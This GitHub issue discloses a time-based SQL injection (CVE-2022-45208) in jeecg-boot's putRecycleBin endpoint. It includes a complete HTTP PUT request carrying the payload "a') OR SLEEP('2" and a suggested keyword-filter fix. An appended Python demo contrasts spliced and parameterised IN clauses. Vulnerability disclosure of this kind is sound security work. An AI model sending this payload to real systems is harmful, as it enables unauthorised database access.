[CVE-2022-45208] /sys/user/putRecycleBin is affected by SQL injection #4126

Closed
@azraelxuemo

sysUserMapper.xml

revertLogicDeleted. You can see that no precompiling is performed
[Screenshot 2022-10-25 11 40 04]

SysUserController.java

[Screenshot 2022-10-25 11 40 32]

SysUserServiceImpl.java

[Screenshot 2022-10-25 11 41 42]

So users can pass in malicious parameters through HTTP requests to achieve SQL injection.

poc

The website will return immediately when the following content is passed in:
[Screenshot 2022-10-25 11 43 33]
After the following content is passed in, the website will return after a delay of 2 seconds:
[Screenshot 2022-10-25 11 43 57]

vuln

An attacker can use this to get data from the database.

payload:

PUT /jeecg-boot/sys/user/putRecycleBin HTTP/1.1
Host: 192.168.1.1:8088
Content-Length: 34
Request-Origion: Knife4j
Accept: */*
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.1.1:8088
Referer: http://192.168.1.1:8088/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

{
"userIds": "a') OR SLEEP('2"
}

patch

In (${})
It seems that this cannot be modified to precompile.
So it is recommended to add some keywords, such as ')
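
An added example, not part of the original issue or of the jeecg-boot code: it runs the `userIds` value from the request above through an `IN (...)` list built by text substitution (the behaviour of MyBatis `${}`) and through one with a bound placeholder per ID (the statement shape MyBatis `<foreach>` with `#{}` produces). Python's `sqlite3` stands in for Java, MyBatis and MySQL here; the table layout, the function names, the quoting step and the `SLEEP` stand-in are assumptions made for the illustration.

```python
import sqlite3

PAYLOAD = "a') OR SLEEP('2"  # the "userIds" value from the request in this issue

def make_db():
    """Constructed sample data; the table layout is an assumption."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sys_user (id TEXT PRIMARY KEY, del_flag INTEGER)")
    db.executemany("INSERT INTO sys_user VALUES (?, 1)", [("u1",), ("u2",), ("u3",)])
    sleep_calls = []
    # Stand-in for MySQL SLEEP(): records its argument instead of delaying.
    db.create_function("SLEEP", 1, lambda s: sleep_calls.append(s) or 0)
    return db, sleep_calls

def revert_spliced(db, user_ids):
    """Text substitution, like IN (${userIds}): the request value becomes SQL."""
    quoted = ",".join(f"'{i}'" for i in user_ids.split(","))  # assumed quoting step
    sql = f"UPDATE sys_user SET del_flag = 0 WHERE del_flag = 1 AND id IN ({quoted})"
    return db.execute(sql).rowcount

def revert_bound(db, user_ids):
    """One bound placeholder per ID, like <foreach> ... #{id} ... </foreach>."""
    ids = [i for i in user_ids.split(",") if i]
    if not ids:
        return 0
    marks = ",".join("?" * len(ids))
    sql = f"UPDATE sys_user SET del_flag = 0 WHERE del_flag = 1 AND id IN ({marks})"
    return db.execute(sql, ids).rowcount

def compare(user_ids):
    """Return (rows restored, SLEEP calls) for the spliced and the bound query."""
    results = []
    for revert in (revert_spliced, revert_bound):
        db, sleep_calls = make_db()
        results.append((revert(db, user_ids), len(sleep_calls)))
    return results

if __name__ == "__main__":
    print(compare("u1,u2"))   # normal request
    print(compare(PAYLOAD))   # request body from the issue
```

With the bound form the whole request value is compared as a literal ID, so it matches no row and the injected function is never evaluated.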
